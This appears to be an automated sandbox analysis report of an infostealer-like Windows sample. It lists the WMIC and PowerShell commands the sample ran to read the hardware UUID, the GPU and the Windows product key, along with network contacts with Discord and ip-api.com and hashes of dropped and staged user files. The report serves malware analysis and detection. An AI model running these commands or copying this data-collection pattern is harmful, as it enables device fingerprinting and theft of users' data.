C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Network
| Country | Destination | Domain | Proto |
| US | 2.22.144.73:80 | tcp | |
| US | 8.8.8.8:53 | blank-0miis.in | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 142.250.180.3:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | 3.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 233.128.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.73.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.90.14.23.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\_MEI18642\python312.dll
| MD5 | cbd02b4c0cf69e5609c77dfd13fba7c4 |
| SHA1 | a3c8f6bfd7ffe0783157e41538b3955519f1e695 |
| SHA256 | ecef0ed97c7b249af3c56cde0bfcae70f66530d716b48b5d94621c3dba8236b5 |
| SHA512 | a3760ecaa9736eb24370a0a20dd22a1ee53b3f8002195947bc7d21b239278ec8e26bcc131d0132c530767d1de59954be7946dcf54fcbf2584052c9d9a5615567 |
C:\Users\Admin\AppData\Local\Temp\_MEI18642\VCRUNTIME140.dll
| MD5 | be8dbe2dc77ebe7f88f910c61aec691a |
| SHA1 | a19f08bb2b1c1de5bb61daf9f2304531321e0e40 |
| SHA256 | 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83 |
| SHA512 | 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655 |
memory/3924-29-0x00007FFF010C0000-0x00007FFF01799000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI18642\base_library.zip
| MD5 | 630153ac2b37b16b8c5b0dbb69a3b9d6 |
| SHA1 | f901cd701fe081489b45d18157b4a15c83943d9d |
| SHA256 | ec4e6b8e9f6f1f4b525af72d3a6827807c7a81978cb03db5767028ebea283be2 |
| SHA512 | 7e3a434c8df80d32e66036d831cbd6661641c0898bd0838a07038b460261bf25b72a626def06d0faa692caf64412ca699b1fa7a848fe9d969756e097cba39e41 |
C:\Users\Admin\AppData\Local\Temp\_MEI18642\_ctypes.pyd
| MD5 | e7629e12d646da3be8d60464ad457cef |
| SHA1 | 17cf7dacb460183c19198d9bb165af620291bf08 |
| SHA256 | eb8affa4e7a4da15c9cda37c68ac8232d885a9d367b28973473949b205384789 |
| SHA512 | 974ae1607093161a5f33eda9e0a0ade214700d05eb728c8157e7b7589c587cc1cdefe0132d16d31c2941ed4eec4668428564609a0a2ced983c8b13f98a84801b |
memory/3924-33-0x00007FFF04810000-0x00007FFF04835000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI18642\libffi-8.dll
| MD5 | 08b000c3d990bc018fcb91a1e175e06e |
| SHA1 | bd0ce09bb3414d11c91316113c2becfff0862d0d |
| SHA256 | 135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece |
| SHA512 | 8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf |
memory/3924-36-0x00007FFF065B0000-0x00007FFF065BF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI18642\_ssl.pyd
| MD5 | a9f1bda7447ab9d69df7391d10290240 |
| SHA1 | 62a3beb8afc6426f84e737162b3ec3814648fe9f |
| SHA256 | 2bb05f7dbd21e67d2a6671411f8ae503dd7538a6767b2169b3033b695557ac13 |
| SHA512 | 539e94b59093dcf62d6f1a312d9b6aac27873f6416cde050e756e367b9907a8c0e7a31109a433b206bf023436d823d3d945f695cc7291604c0a24bcd27dc1451 |
C:\Users\Admin\AppData\Local\Temp\_MEI18642\_sqlite3.pyd
| MD5 | b8aa2de7df9ba5eab6609dcf07829aa6 |
| SHA1 | 4b8420c44784745b1e2d2a25bd4174fc3da4c881 |
| SHA256 | 644669d0875b33aa7e9d3f1856bc8b696f796ad61c7edb9219f8f0ff1a69531a |
| SHA512 | 5587efef4c349a137d785594bb7cbffef19fd418bf7d6fb2a4a3e2107354f5f874eeb7e18799031bde335bc65e4ca53f73793a60c67a5482c7e6d1564894ba17 |
C:\Users\Admin\AppData\Local\Temp\_MEI18642\_socket.pyd
| MD5 | 4ee9483c490fa48ee9a09debe0dd7649 |
| SHA1 | f9ba6501c7b635f998949cf3568faf4591f21edd |
| SHA256 | 9c644a6db56052cf2680476648391b47b603957ffb353ad44a68dac761805ef1 |
| SHA512 | c55ddd782cc52d1aba6fd4466ed72387aad4debd3c48315db16aa35d3a5265478d8b197a3a0e0bcf9277004c10b4ccfe8706ab9d0e886d19c0cc4cb406fab4a4 |
C:\Users\Admin\AppData\Local\Temp\_MEI18642\_queue.pyd
| MD5 | 048e8e18d1ae823e666c501c8a8ad1dd |
| SHA1 | 63b1513a9f4dfd5b23ec8466d85ef44bfb4a7157 |
| SHA256 | 7285eef53fd485d6093a9aecbe8fc87c6d70ae4e91d41f382a2a3edff7ebc6c8 |
| SHA512 | e57e162d1099b696d11bad172d36824a41fde3dd1d3be0dbd239746f8c87f17e78f889c8ad75ffdac89032b258e6f55f0dab82aae21b9d7ad166ceedfe131b61 |
C:\Users\Admin\AppData\Local\Temp\_MEI18642\_lzma.pyd
| MD5 | ed348285c1ad1db0effd915c0cb087c3 |
| SHA1 | b5b8446d2e079d451c2de793c0f437d23f584f7b |
| SHA256 | fa84770ccf4394d046ed69edaea71957306a25def4986ee6650daf0a2c2d3e43 |
| SHA512 | 28a4c21bdb0bd697e93b276c184bfc5e317d930c4462e655d9d9ef7487168809ee952e32a856304cdd67a76d6b2286bf94fe9b9de6706c8d36a810aa916ce8e1 |
C:\Users\Admin\AppData\Local\Temp\_MEI18642\_hashlib.pyd
| MD5 | 3c1056edef1c509136160d69d94c4b28 |
| SHA1 | e944653161631647a301b3bddc08f8a13a4bf23e |
| SHA256 | 41e4bb3c6064cb9e8a62e17056aea19e3d7e6ff1efc17c18d76118ac4e3b7243 |
| SHA512 | a03fcf2af6df72923714f66d26774a39e709fa8ad879d72b838d531692231f68480b5ff65b83358ad6b7b411f4ece7028a8613c3b1177acf1d3c933a843ca19a |
C:\Users\Admin\AppData\Local\Temp\_MEI18642\_decimal.pyd
| MD5 | 94fbb133e2b93ea55205ecbd83fcae39 |
| SHA1 | 788a71fa29e10fc9ea771c319f62f9f0429d8550 |
| SHA256 | f8e8fbeee7c8454fa42fe47f1da9c63f6b6e631b0dff22c80631f426efcba78b |
| SHA512 | b488f06be28fc8ffd3d8be6b986c7a35ab868198b10943bfa59b9130ebd50354adb9e1818b73ed1f2c92d33d869091e9167346b4430668ca31dd46a845276dea |
C:\Users\Admin\AppData\Local\Temp\_MEI18642\_bz2.pyd
| MD5 | ba8871f10f67817358fe84f44b986801 |
| SHA1 | d57a3a841415969051826e8dcd077754fd7caea0 |
| SHA256 | 9d30387ee07585516f8ce479fcd4e052597835d4149568c1d8382a4a3a0ae7e1 |
| SHA512 | 8e23b032b785f37b920206fa3064c5fa0e28949f23b2e985fae26c9a355a6bc33dcd380925091f627d4d7936f0958e90fa7c022d89c73db8a1ea6ad267a1a341 |
C:\Users\Admin\AppData\Local\Temp\_MEI18642\unicodedata.pyd
| MD5 | 9a03b477b937d8258ef335c9d0b3d4fa |
| SHA1 | 5f12a8a9902ea1dc9bbb36c88db27162aa4901a5 |
| SHA256 | 4d6e035a366c6f74660f74b8b816add345fa7f1c6cf0793dcf1ed9f91b6ce6a4 |
| SHA512 | d3d8bb51474f93d02837580f53aacf5ca9eaf8587e83cddb742c707a251fe86f14e8e665aa4423ac99d74c6c94d95c7df3bfd513b3d5c69661e604f22dcabebe |
C:\Users\Admin\AppData\Local\Temp\_MEI18642\sqlite3.dll
| MD5 | ce4f27e09044ec688edeaf5cb9a3e745 |
| SHA1 | b184178e8a8af7ac1cd735b8e4b8f45e74791ac9 |
| SHA256 | f940ff66960441c76a258846d66d4a357e72ad8fbb6bde62b5e5fbe90103b92d |
| SHA512 | bab572324dcf12e71fb6a9648e9224528bd29c75e7d3b978b7068eca0d6f2cb795165756249f47e1db401267b0a1e5fd06c35b6cf5595a013240f9e3444ea083 |
C:\Users\Admin\AppData\Local\Temp\_MEI18642\select.pyd
| MD5 | a71d12c3294b13688f4c2b4d0556abb8 |
| SHA1 | 13a6b7f99495a4c8477aea5aecc183d18b78e2d4 |
| SHA256 | 0f3ae1b65102d38f6b33fcbbdadd347aa1b0c09ed8028d4412982b3bd97caf0f |
| SHA512 | ff16cb399b661c170bf79108c62010d32804ead3f6c565b0755a26b62b4f51290bcb71face6cebaa82c0f9b3863aaaa7fa57ddc1e2bbae8598b047d01d15cbe5 |
C:\Users\Admin\AppData\Local\Temp\_MEI18642\rarreg.key
| MD5 | 9795f79ddb61aa29027f4d68496b379c |
| SHA1 | 2b28db4d9ac8cffba73048444b1df25346f4ef32 |
| SHA256 | e63f3d6710097498085564dfc85add6ed4cf44238c33d20820d2426abcee4e31 |
| SHA512 | e44fbbc02da75d173c81bdfda9b14102997609af06fd50c51030430c3c80193dadb632592997361c79b0dfed50ccc0e1743c306a881401a1c78a6a7facb45d4d |
C:\Users\Admin\AppData\Local\Temp\_MEI18642\rar.exe
| MD5 | 9c223575ae5b9544bc3d69ac6364f75e |
| SHA1 | 8a1cb5ee02c742e937febc57609ac312247ba386 |
| SHA256 | 90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213 |
| SHA512 | 57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09 |
C:\Users\Admin\AppData\Local\Temp\_MEI18642\libssl-3.dll
| MD5 | 264be59ff04e5dcd1d020f16aab3c8cb |
| SHA1 | 2d7e186c688b34fdb4c85a3fce0beff39b15d50e |
| SHA256 | 358b59da9580e7102adfc1be9400acea18bc49474db26f2f8bacb4b8839ce49d |
| SHA512 | 9abb96549724affb2e69e5cb2c834ecea3f882f2f7392f2f8811b8b0db57c5340ab21be60f1798c7ab05f93692eb0aeab077caf7e9b7bb278ad374ff3c52d248 |
C:\Users\Admin\AppData\Local\Temp\_MEI18642\libcrypto-3.dll
| MD5 | 7f1b899d2015164ab951d04ebb91e9ac |
| SHA1 | 1223986c8a1cbb57ef1725175986e15018cc9eab |
| SHA256 | 41201d2f29cf3bc16bf32c8cecf3b89e82fec3e5572eb38a578ae0fb0c5a2986 |
| SHA512 | ca227b6f998cacca3eb6a8f18d63f8f18633ab4b8464fb8b47caa010687a64516181ad0701c794d6bfe3f153662ea94779b4f70a5a5a94bb3066d8a011b4310d |
C:\Users\Admin\AppData\Local\Temp\_MEI18642\blank.aes
| MD5 | 5a3735ca91c1c8c1a06e93f279fada39 |
| SHA1 | 0da37688e04f6540fa1370eb90c3b22dd6866433 |
| SHA256 | 3c5cff8ff19d7dad79b8cc0d6462f890b5659267377f603585e05d2c539a7f2c |
| SHA512 | 6008d317557bd51d38a02b3b343a34e375727d83fce897b7aa765fc4c3142efce1a4d4777801a49d34701467dcfaeb2d0abbb712dc4c1addae4f3f0e10f8e2dc |
memory/3924-58-0x00007FFF04590000-0x00007FFF045BD000-memory.dmp
memory/3924-60-0x00007FFF04ED0000-0x00007FFF04EE9000-memory.dmp
memory/3924-62-0x00007FFF04560000-0x00007FFF04584000-memory.dmp
memory/3924-64-0x00007FFF00F40000-0x00007FFF010B6000-memory.dmp
memory/3924-66-0x00007FFF04DF0000-0x00007FFF04E09000-memory.dmp
memory/3924-68-0x00007FFF04800000-0x00007FFF0480D000-memory.dmp
memory/3924-70-0x00007FFF04520000-0x00007FFF04553000-memory.dmp
memory/3924-72-0x00007FFF010C0000-0x00007FFF01799000-memory.dmp
memory/3924-73-0x00007FFF00E70000-0x00007FFF00F3D000-memory.dmp
memory/3924-76-0x00007FFF04810000-0x00007FFF04835000-memory.dmp
memory/3924-77-0x0000019095D10000-0x0000019096239000-memory.dmp
memory/3924-78-0x00007FFF00940000-0x00007FFF00E69000-memory.dmp
memory/3924-82-0x00007FFF04590000-0x00007FFF045BD000-memory.dmp
memory/3924-86-0x00007FFEFFD20000-0x00007FFEFFE3B000-memory.dmp
memory/3924-85-0x00007FFF04ED0000-0x00007FFF04EE9000-memory.dmp
memory/3924-83-0x00007FFF047F0000-0x00007FFF047FD000-memory.dmp
memory/3924-80-0x00007FFF04500000-0x00007FFF04514000-memory.dmp
memory/3924-90-0x00007FFF04560000-0x00007FFF04584000-memory.dmp
memory/836-92-0x00007FFEF0813000-0x00007FFEF0814000-memory.dmp
memory/836-94-0x000002B75F6B0000-0x000002B75F6C0000-memory.dmp
memory/836-93-0x000002B779590000-0x000002B77961A000-memory.dmp
memory/836-99-0x00007FFEF0810000-0x00007FFEF11FC000-memory.dmp
memory/3924-100-0x00007FFF00F40000-0x00007FFF010B6000-memory.dmp
memory/1424-101-0x000001D96A0F0000-0x000001D96A112000-memory.dmp
memory/836-102-0x000002B779830000-0x000002B779932000-memory.dmp
memory/836-105-0x000002B779940000-0x000002B7799B6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i4osf1b0.kcg.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/1424-132-0x000001D96A630000-0x000001D96A67C000-memory.dmp
memory/1424-193-0x000001D96A550000-0x000001D96A570000-memory.dmp
memory/836-199-0x00007FFEF0810000-0x00007FFEF11FC000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 268b890dae39e430e8b127909067ed96 |
| SHA1 | 35939515965c0693ef46e021254c3e73ea8c4a2b |
| SHA256 | 7643d492a6f1e035b63b2e16c9c21d974a77dfd2d8e90b9c15ee412625e88c4c |
| SHA512 | abc4b2ce10a6566f38c00ad55e433791dd45fca47deec70178daf0763578ff019fb0ec70792d5e9ecde4eb6778a35ba8a8c7ecd07550597d9bbb13521c9b98fb |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 912c9a0b4c618a59d75f3f62d89c445b |
| SHA1 | 8b7c76a9fe8522544e0c9c1b532adb5cd993aeb9 |
| SHA256 | 9b62f6617c6db6f029c6700e20a1c3687bb3c63fffed834ec6d1c8b1aed21b85 |
| SHA512 | 12dfce4c3a0769cf0ccb823b6f297ce1a6228f120d5b14398b2db41809fcaccab62ee520efba2de906622b02408c47fe407838bf196ee331e9f465507ed23d70 |
memory/3924-243-0x00007FFF04DF0000-0x00007FFF04E09000-memory.dmp
C:\Windows\System32\drivers\etc\hosts
| MD5 | d5371674f26f144bf68f800bb3b80d5a |
| SHA1 | a5ae4e82a6ba9118e28b767d3522c6a3fb0ee582 |
| SHA256 | f2ca2cbdec30ce8730436e1bed3c166e005e4742c6a8c931e50e873cdc8ebb03 |
| SHA512 | 21e068860c0671e54bfd4862735a51d0dc790a737b3f9835f64dafcdb2c0d50bf49b8027d6c43c79ebabf2ac7dcd6be084c613e711fab92a54bb3cfefcb7fb3f |
\??\c:\Users\Admin\AppData\Local\Temp\nwth3d11\nwth3d11.cmdline
| MD5 | 192543784977d2de821d4922412027e7 |
| SHA1 | 280123ca01384d7e6c12ed094dc8d99b1f96e501 |
| SHA256 | 0e38c737041d09234e7056aaf3e19a9cece5c95616f10eef38eded57c99b4732 |
| SHA512 | 9a1260b005cbc0298a902b0f766c0ed0ce07ba9fc38cb6246f15784e66aa5a465a05ed5f8e600487865c1457bf45f2c7097e4d592f0e831d88e2335c18a7f350 |
\??\c:\Users\Admin\AppData\Local\Temp\nwth3d11\nwth3d11.0.cs
| MD5 | c76055a0388b713a1eabe16130684dc3 |
| SHA1 | ee11e84cf41d8a43340f7102e17660072906c402 |
| SHA256 | 8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7 |
| SHA512 | 22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2 |
\??\c:\Users\Admin\AppData\Local\Temp\nwth3d11\CSCBD0D024427384C299BA7C176B2D0357A.TMP
| MD5 | 02c06cbbada24b30a44fd7995a7464e8 |
| SHA1 | e3ba4c526c1f23709f306132f4bebf5cb15ca7b1 |
| SHA256 | cd751c8a045051c5eddb4eebbe193e61c58cff237d9d95a816d33b938f6391bb |
| SHA512 | 4d0925b426371fc5d7d252fa51ca21d9a9f03e12be88fea2f0e43cdd57af7465c412c09be67e098cc429f564cb08f27d25f90046205e6269054a828062cac5b4 |
C:\Users\Admin\AppData\Local\Temp\RESC966.tmp
| MD5 | 5240c2529ea121bc62dea1f3c28ca531 |
| SHA1 | a1d47a9d0c513edd5e97b924be5f23b387228d9f |
| SHA256 | f171327103cf0768ceee14688cbf5f7f0095d931a249280ac30c3561faf7eac6 |
| SHA512 | 94c3a175683047688cb42d6cb70fcebb92a597c9f982cd649de1b0b9cfc1cc3d79f9973883ac8689e9778708258901f3d868dfd5ee05ff98c0ee0913a5c32679 |
C:\Users\Admin\AppData\Local\Temp\nwth3d11\nwth3d11.dll
| MD5 | 891fc590fd6a28aac348b7ad90677548 |
| SHA1 | 59457ce97774e91fbf01c3ee955d8885a1b08691 |
| SHA256 | 2da913f02b15a40e51b3ef2dd4ef0e92b3716d2091e3f73a8a38ca0e2593cf9c |
| SHA512 | dbba36c1d17100e913865c9ccb63e8a0b279e0b32bc04c9c6782e3260d6a975fc56e78a0266ea9d4c2b5b3278c35f3d6d8811eb6d33968df58e7e81aad70b081 |
memory/4172-379-0x0000017427D80000-0x0000017427D88000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 412622b0b6e439a77e7a88fa117eda31 |
| SHA1 | 80f56b45a558e6ebba0ffefb9dacbfb16263f1a8 |
| SHA256 | de58fcca098bb81b9064ec09cc7e49a7c844ef86ad9abc8ac3571c7d3f378fd6 |
| SHA512 | 3655d040dead77b208ffaef525c417d11ead12c8f78350bfc55de926dd175f38b42a03c0712cedf95363b2f92525eb57d747e492f3400c1ce0a558ba5a24a32e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 75a3d3ccd73a7c90b1cee43010838861 |
| SHA1 | 153a5cfc8f8d3e452716f279d30fffbc85c8cb5b |
| SHA256 | 79b4a4cef4637456608fc958aa32d1f0263387cd49b3ae22030e5e0b6c09b977 |
| SHA512 | 2df25b3b125d6e512f46f9315bab95e6a36cfc2e9ee484c0413b234057c7964b53431d9f3cce37dbe1b0e56e612532b63084fc264e4c15f14064d1f81c791972 |
memory/3924-416-0x00007FFF00F40000-0x00007FFF010B6000-memory.dmp
memory/3924-424-0x00007FFEFFD20000-0x00007FFEFFE3B000-memory.dmp
memory/3924-421-0x00007FFF00940000-0x00007FFF00E69000-memory.dmp
memory/3924-420-0x00007FFF00E70000-0x00007FFF00F3D000-memory.dmp
memory/3924-419-0x00007FFF04520000-0x00007FFF04553000-memory.dmp
memory/3924-410-0x00007FFF010C0000-0x00007FFF01799000-memory.dmp
memory/3924-411-0x00007FFF04810000-0x00007FFF04835000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 201a545cca0b0f6d24fbf45bf4ecd1b4 |
| SHA1 | d0bce3adf6dce4e74448ae40f00dc524362f9d3f |
| SHA256 | dc276445d733e1a07f07d567b23b5c39605dff9253a2c3875174c44eb3c2cf6d |
| SHA512 | 6772780c6718eba43523698dbdbf6d54fb369c26b7198604b9040c75ca7e78e478dd9096bbdb5b7ea230829bf724374d6980cb5c6812bf99bdfcaa96c54e8921 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\LimitSearch.jpeg
| MD5 | 57118548eb471639de3a3083f84f9042 |
| SHA1 | d3524a6cab11bd68f398737cf74f870cad6a3f26 |
| SHA256 | 4ef0ceae18af96541c844cd0603db69f392916d64ded379059720a86300ac624 |
| SHA512 | f3770060359cfd45523278a37d2b409eaf7e1cf82ebe47d2646e47b9df350f1cdf2bb829f54a798ee63ce6ef3949a803a761e068cb2d0d77e9fece4da4940baa |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\WaitSend.png
| MD5 | 8fee46f96d52bae3116031cd6d76ae08 |
| SHA1 | 8da8eb65917f8adb7564042f6b07b8af4c7a47dd |
| SHA256 | 82523d27f08c72e09651ddf3572189febc0207dd4beb9fc0b44e37a8030f5589 |
| SHA512 | 773451f4f12799a95a26fa83b801382894598a8d60d069d0eb4a8ee184469398a08d7006f2e8b2a83ce8a026bdf114ca81c4ec3502b269908de5a71320ccbdb6 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\Are.docx
| MD5 | a33e5b189842c5867f46566bdbf7a095 |
| SHA1 | e1c06359f6a76da90d19e8fd95e79c832edb3196 |
| SHA256 | 5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454 |
| SHA512 | f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\Files.docx
| MD5 | 4a8fbd593a733fc669169d614021185b |
| SHA1 | 166e66575715d4c52bcb471c09bdbc5a9bb2f615 |
| SHA256 | 714cd32f8edacb3befbfc4b17db5b6eb05c2c8936e3bae14ea25a6050d88ae42 |
| SHA512 | 6b2ebbbc34cd821fd9b3d7711d9cdadd8736412227e191883e5df19068f8118b7c80248eb61cc0a2f785a4153871a6003d79de934254b2c74c33b284c507a33b |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\Opened.docx
| MD5 | bfbc1a403197ac8cfc95638c2da2cf0e |
| SHA1 | 634658f4dd9747e87fa540f5ba47e218acfc8af2 |
| SHA256 | 272ed278e82c84cf4f80f48ec7989e1fc35f2055d6d05b63c8a31880846597a6 |
| SHA512 | b8938526fcbf7152805aec130ca553e3ec949cb825430a5d0a25c90ec5eb0863857010484a4b31fdc4bb65a4c92ad7127c812b93114be4569a677f60debe43b1 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\Recently.docx
| MD5 | 3b068f508d40eb8258ff0b0592ca1f9c |
| SHA1 | 59ac025c3256e9c6c86165082974fe791ff9833a |
| SHA256 | 07db44a8d6c3a512b15f1cb7262a2d7e4b63ced2130bc9228515431699191cc7 |
| SHA512 | e29624bc8fecb0e2a9d917642375bd97b42502e5f23812195a61a4920cae5b6ed540e74dfcf8432dcceb7de906ad0501cdd68056f9b0ec86a6bb0c1e336bfe32 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\These.docx
| MD5 | 87cbab2a743fb7e0625cc332c9aac537 |
| SHA1 | 50f858caa7f4ac3a93cf141a5d15b4edeb447ee7 |
| SHA256 | 57e3b0d22fa619da90237d8bcf8f922b142c9f6abf47efc5a1f5b208c4d3f023 |
| SHA512 | 6b678f0dd0030806effe6825fd52a6a30b951e0c3dcf91dfd7a713d387aa8b39ec24368e9623c463360acba5e929e268f75ce996526c5d4485894b8ac6b2e0fa |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Downloads\BackupConvertTo.mpg
| MD5 | f7c643c1104c711ff797ee2b154969ac |
| SHA1 | f49746c762f5304f09113755146918125c8ad4a2 |
| SHA256 | d61bf011d804951c8e57fb3f926ba938f4c940f982a2f36efa8fd7eb0f562dd2 |
| SHA512 | 475efb861cf7a5898c13f3b8baf9131e0dc3e27599bf50331cb49f26ace2ee8dc39ce487a54533442b42c8d28ca1e3123ac4e21103c3d5d582459d7d0eeb90d2 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Downloads\BackupSet.ocx
| MD5 | d6759dcf8302c1632a0225f5180437f9 |
| SHA1 | 1884ff2292b797cc1f2006e6086e52304e7efdb1 |
| SHA256 | 0c4c48c7595e9baebfd548ebe84162a6793b2e14ad1c371736707f988f765cf0 |
| SHA512 | 331b7a844c6134b115211e77fca56bb6ef6e1be61b1cc70e94f4bfd951c74142887ad8e58c917f0d202349ed2e561c8a0786c3447e25b92ba2293078bdd5a5c3 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Downloads\GrantDisable.csv
| MD5 | 489f56a8785203d69e74dbf7f9e17baf |
| SHA1 | 5ef72ec5dc744d60b49718d777f9892e84825b7b |
| SHA256 | 75b468c2601df759849644f5419144d87bfefdefb92ba2f0501714aab1fa9ded |
| SHA512 | 4cd2575ed926073be058da1d32d2feba74ecad8efdc78d13cbc20e1783d19a0b3b8856c259a36e5839eb53cc8959f9e6f8c6970b1d36b506f2fca94e927dc258 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Pictures\My Wallpaper.jpg
| MD5 | a51464e41d75b2aa2b00ca31ea2ce7eb |
| SHA1 | 5b94362ac6a23c5aba706e8bfd11a5d8bab6097d |
| SHA256 | 16d5506b6663085b1acd80644ffa5363c158e390da67ed31298b85ddf0ad353f |
| SHA512 | b2a09d52c211e7100e3e68d88c13394c64f23bf2ec3ca25b109ffb1e1a96a054f0e0d25d2f2a0c2145616eabc88c51d63023cef5faa7b49129d020f67ab0b1ff |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Pictures\PublishMove.jpg
| MD5 | 42b7f6d7249b85a0162f99831db70ab8 |
| SHA1 | 3e8da95e3d8b94917a201be97b44d2ed42a3ed44 |
| SHA256 | f4c2004120200015254369ec5dc1c6c030c5f622ffded855d7a1cd8f52717263 |
| SHA512 | 3918431dc18209de7839e8f15eafca58d64f4202a76fde847d159c58dbda367df8c7a9bec35cc87542cd4ada235535b2e80142ad1df9b541860ca60128f6275a |
memory/3924-496-0x00007FFF010C0000-0x00007FFF01799000-memory.dmp
memory/3924-513-0x0000019095D10000-0x0000019096239000-memory.dmp
memory/3924-566-0x00007FFEFFD20000-0x00007FFEFFE3B000-memory.dmp
memory/3924-563-0x00007FFF00940000-0x00007FFF00E69000-memory.dmp
memory/3924-552-0x00007FFF010C0000-0x00007FFF01799000-memory.dmp
memory/3924-562-0x00007FFF00E70000-0x00007FFF00F3D000-memory.dmp
memory/3924-561-0x00007FFF04520000-0x00007FFF04553000-memory.dmp
memory/3924-560-0x00007FFF04800000-0x00007FFF0480D000-memory.dmp
memory/3924-559-0x00007FFF04DF0000-0x00007FFF04E09000-memory.dmp
memory/3924-558-0x00007FFF00F40000-0x00007FFF010B6000-memory.dmp
memory/3924-557-0x00007FFF04560000-0x00007FFF04584000-memory.dmp
memory/3924-556-0x00007FFF04ED0000-0x00007FFF04EE9000-memory.dmp
memory/3924-555-0x00007FFF04590000-0x00007FFF045BD000-memory.dmp
memory/3924-554-0x00007FFF065B0000-0x00007FFF065BF000-memory.dmp
memory/3924-565-0x00007FFF047F0000-0x00007FFF047FD000-memory.dmp
memory/3924-564-0x00007FFF04500000-0x00007FFF04514000-memory.dmp
memory/3924-553-0x00007FFF04810000-0x00007FFF04835000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-26 13:10
Reported
2024-06-26 13:14
Platform
win10v2004-20240611-fr
Max time kernel
127s
Max time network
152s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
